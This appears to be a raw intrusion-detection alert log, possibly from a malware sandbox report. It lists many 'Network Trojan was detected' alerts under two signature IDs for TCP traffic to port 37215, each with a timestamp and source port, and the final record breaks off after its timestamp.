          Timestamp:06/08/24-15:05:37.709986
          SID:2835222
          Source Port:38478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547908
          SID:2835222
          Source Port:53762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780845
          SID:2835222
          Source Port:57560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406101
          SID:2835222
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269222
          SID:2835222
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824327
          SID:2835222
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599511
          SID:2835222
          Source Port:42934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178567
          SID:2829579
          Source Port:48436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517870
          SID:2835222
          Source Port:59800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236978
          SID:2835222
          Source Port:38732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449793
          SID:2835222
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449988
          SID:2835222
          Source Port:45500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789629
          SID:2835222
          Source Port:35222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739389
          SID:2829579
          Source Port:51834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467157
          SID:2829579
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741179
          SID:2835222
          Source Port:33610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449535
          SID:2829579
          Source Port:52662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.807299
          SID:2829579
          Source Port:36020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672624
          SID:2835222
          Source Port:56364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039384
          SID:2835222
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782232
          SID:2829579
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158156
          SID:2835222
          Source Port:39326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792624
          SID:2829579
          Source Port:36924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806022
          SID:2829579
          Source Port:52064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114211
          SID:2835222
          Source Port:48436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861418
          SID:2829579
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107489
          SID:2829579
          Source Port:48274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512465
          SID:2829579
          Source Port:46658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021458
          SID:2829579
          Source Port:36922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356920
          SID:2829579
          Source Port:43570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789088
          SID:2835222
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041892
          SID:2829579
          Source Port:42264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306187
          SID:2829579
          Source Port:37872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743397
          SID:2829579
          Source Port:35178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707871
          SID:2829579
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747405
          SID:2835222
          Source Port:44738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270051
          SID:2835222
          Source Port:34908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.821857
          SID:2835222
          Source Port:52876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495817
          SID:2829579
          Source Port:41628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262235
          SID:2835222
          Source Port:50738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109265
          SID:2829579
          Source Port:51402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793180
          SID:2829579
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114335
          SID:2829579
          Source Port:58842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107561
          SID:2829579
          Source Port:50030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808740
          SID:2829579
          Source Port:49780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112321
          SID:2835222
          Source Port:60920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446687
          SID:2829579
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810614
          SID:2829579
          Source Port:37122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550647
          SID:2829579
          Source Port:53820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056370
          SID:2829579
          Source Port:40568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602112
          SID:2835222
          Source Port:54932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551328
          SID:2835222
          Source Port:50034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820993
          SID:2829579
          Source Port:42332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891643
          SID:2835222
          Source Port:43880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155717
          SID:2835222
          Source Port:55500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274361
          SID:2835222
          Source Port:52484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911797
          SID:2829579
          Source Port:58348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020805
          SID:2835222
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463250
          SID:2835222
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599387
          SID:2829579
          Source Port:49974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179481
          SID:2835222
          Source Port:41066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352912
          SID:2829579
          Source Port:60906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550184
          SID:2829579
          Source Port:45018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356651
          SID:2829579
          Source Port:49454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107717
          SID:2829579
          Source Port:55252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789528
          SID:2835222
          Source Port:43326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136322
          SID:2829579
          Source Port:51174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166531
          SID:2829579
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858087
          SID:2829579
          Source Port:51396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604778
          SID:2829579
          Source Port:49524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742128
          SID:2829579
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511035
          SID:2829579
          Source Port:42572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042646
          SID:2835222
          Source Port:49688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705472
          SID:2829579
          Source Port:54142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912952
          SID:2835222
          Source Port:35072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405151
          SID:2829579
          Source Port:39778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354222
          SID:2829579
          Source Port:38706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804362
          SID:2835222
          Source Port:36562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893809
          SID:2835222
          Source Port:53594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258006
          SID:2835222
          Source Port:54152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152454
          SID:2829579
          Source Port:46346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005505
          SID:2835222
          Source Port:39152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243462
          SID:2829579
          Source Port:48906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663754
          SID:2835222
          Source Port:46460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040512
          SID:2829579
          Source Port:50662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242957
          SID:2829579
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599461
          SID:2835222
          Source Port:44358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132592
          SID:2829579
          Source Port:47070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175957
          SID:2829579
          Source Port:47634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176132
          SID:2829579
          Source Port:47164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731745
          SID:2835222
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663724
          SID:2835222
          Source Port:55996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037284
          SID:2829579
          Source Port:51506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099524
          SID:2835222
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517241
          SID:2835222
          Source Port:37784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743204
          SID:2835222
          Source Port:56058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780549
          SID:2829579
          Source Port:49462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465686
          SID:2835222
          Source Port:40360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808981
          SID:2829579
          Source Port:47748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508444
          SID:2835222
          Source Port:55474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241241
          SID:2829579
          Source Port:39532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601208
          SID:2835222
          Source Port:57182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.794765
          SID:2829579
          Source Port:59018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732104
          SID:2829579
          Source Port:39380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087886
          SID:2835222
          Source Port:45920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808119
          SID:2835222
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351527
          SID:2835222
          Source Port:37982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192243
          SID:2835222
          Source Port:52684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111101
          SID:2829579
          Source Port:49414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.795324
          SID:2829579
          Source Port:48112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887621
          SID:2835222
          Source Port:53770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191433
          SID:2829579
          Source Port:44232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403206
          SID:2835222
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243071
          SID:2829579
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733780
          SID:2835222
          Source Port:53018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157840
          SID:2835222
          Source Port:58708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014559
          SID:2829579
          Source Port:51302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732160
          SID:2835222
          Source Port:41050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005732
          SID:2835222
          Source Port:49762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352656
          SID:2829579
          Source Port:58792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857994
          SID:2835222
          Source Port:33308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734597
          SID:2835222
          Source Port:34668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059495
          SID:2835222
          Source Port:59126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153468
          SID:2829579
          Source Port:51326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794726
          SID:2829579
          Source Port:55240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356504
          SID:2835222
          Source Port:59478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035146
          SID:2835222
          Source Port:50404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897225
          SID:2835222
          Source Port:60382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133911
          SID:2835222
          Source Port:37092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912748
          SID:2829579
          Source Port:34858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020963
          SID:2835222
          Source Port:38404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732548
          SID:2829579
          Source Port:55872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741596
          SID:2835222
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354114
          SID:2835222
          Source Port:46314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550209
          SID:2835222
          Source Port:58252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356391
          SID:2829579
          Source Port:41130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236802
          SID:2835222
          Source Port:52796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816569
          SID:2835222
          Source Port:35368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351527
          SID:2829579
          Source Port:34358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733251
          SID:2835222
          Source Port:33220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733805
          SID:2829579
          Source Port:47980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110798
          SID:2835222
          Source Port:48804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441410
          SID:2835222
          Source Port:36044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162955
          SID:2835222
          Source Port:33744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449029
          SID:2829579
          Source Port:56634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705207
          SID:2829579
          Source Port:43920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129422
          SID:2835222
          Source Port:47146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133147
          SID:2829579
          Source Port:46990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184122
          SID:2835222
          Source Port:45970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131455
          SID:2835222
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734513
          SID:2829579
          Source Port:41280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115384
          SID:2829579
          Source Port:46710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353255
          SID:2835222
          Source Port:58040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516805
          SID:2829579
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603320
          SID:2835222
          Source Port:37830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303014
          SID:2829579
          Source Port:59404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732475
          SID:2835222
          Source Port:40856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240671
          SID:2829579
          Source Port:44058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184163
          SID:2829579
          Source Port:47420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471116
          SID:2835222
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672275
          SID:2835222
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787993
          SID:2835222
          Source Port:37108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353864
          SID:2829579
          Source Port:44556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354602
          SID:2829579
          Source Port:40196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861165
          SID:2835222
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108151
          SID:2835222
          Source Port:60452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739305
          SID:2829579
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471916
          SID:2835222
          Source Port:49568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732693
          SID:2835222
          Source Port:55460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160423
          SID:2829579
          Source Port:33884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806974
          SID:2829579
          Source Port:39028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599233
          SID:2835222
          Source Port:54394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817572
          SID:2835222
          Source Port:35806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356789
          SID:2829579
          Source Port:42618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740021
          SID:2829579
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407331
          SID:2829579
          Source Port:59202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799860
          SID:2835222
          Source Port:53814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741726
          SID:2835222
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551887
          SID:2829579
          Source Port:38788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601014
          SID:2835222
          Source Port:48158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673170
          SID:2835222
          Source Port:53418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403567
          SID:2835222
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466632
          SID:2829579
          Source Port:56700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378324
          SID:2829579
          Source Port:45314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448694
          SID:2835222
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784388
          SID:2835222
          Source Port:45190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440875
          SID:2835222
          Source Port:36884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018973
          SID:2835222
          Source Port:32996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.735515
          SID:2829579
          Source Port:35622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395340
          SID:2835222
          Source Port:57624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517140
          SID:2835222
          Source Port:42904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548579
          SID:2835222
          Source Port:42392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743023
          SID:2835222
          Source Port:34760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354725
          SID:2829579
          Source Port:42498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466535
          SID:2835222
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788418
          SID:2829579
          Source Port:40200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733061
          SID:2835222
          Source Port:47532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134251
